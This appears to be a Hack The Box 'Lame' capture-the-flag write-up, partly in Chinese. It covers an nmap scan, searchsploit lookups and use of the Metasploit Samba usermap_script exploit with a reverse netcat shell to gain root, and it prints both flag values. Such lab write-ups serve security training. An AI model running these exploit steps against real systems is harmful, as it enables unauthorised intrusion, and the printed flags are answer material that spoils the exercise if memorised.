Hackthebox Lame
NMAP Scanning
──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ sudo nmap -sS -sV -sC -p- 10.129.145.147 -oN nmap_full_scan
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-11 10:06 EDT
Nmap scan report for localhost (10.129.145.147)
Host is up (0.25s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.62
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open �m V Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2023-07-11T10:21:07-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2h09m07s, deviation: 2h49m46s, median: 9m04s
|_smb2-time: Protocol negotiation failed (SMB2)
获得Shell
┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit vsftpd 2.3.4
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb
虽然metasploit模块,但是却执行失败。
其实在NMAP扫描结果可知samba的版本:
┌──(kali㉿kali)-[~/Desktop/Hackthebox/Lame]
└─$ searchsploit samba 3.0.20
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
在Metasploit中也有samba的漏洞利用模块:
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.62
LHOST => 10.10.14.62
msf6 exploit(multi/samba/usermap_script) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.145.147
RHOSTS => 10.129.145.147
msf6 exploit(multi/samba/usermap_script) > exploit
[*] Started reverse TCP handler on 10.10.14.62:5555
[*] Command shell session 1 opened (10.10.14.62:5555 -> 10.129.145.147:49206) at 2023-07-11 10:36:57 -0400
id
uid=0(root) gid=0(root)
root@lame:/root# cat root.txt
09a885cf7c8bfbd4d21cbffe69eef798
root@lame:/home# cd makis
root@lame:/home/makis# ls -alh
total 28K
drwxr-xr-x 2 makis makis 4.0K Mar 14 2017 .
drwxr-xr-x 6 root root 4.0K Mar 14 2017 ..
-rw------- 1 makis makis 1.1K Mar 14 2017 .bash_history
-rw-r--r-- 1 makis makis 220 Mar 14 2017 .bash_logout
-rw-r--r-- 1 makis makis 2.9K Mar 14 2017 .bashrc
-rw-r--r-- 1 makis makis 586 Mar 14 2017 .profile
-rw-r--r-- 1 makis makis 0 Mar 14 2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis 33 Jul 11 10:08 user.txt
root@lame:/home/makis# cat user.txt
bf43559a3fed24e30fe5cbfdafef3c67
经验教训
-
对于Samba服务,不能想当然的就以为通过smbclient命令获得共享目录,或者enum4linux获取可能的用户名,而是要注意其版本号,看是否存在相关的漏洞
-
对vsftpd 2.3.4漏洞,一看到是该版本,就错误的认为突破点应该就在该服务上,但是本靶机的结果表明这样先入为主的想法是完全错误的。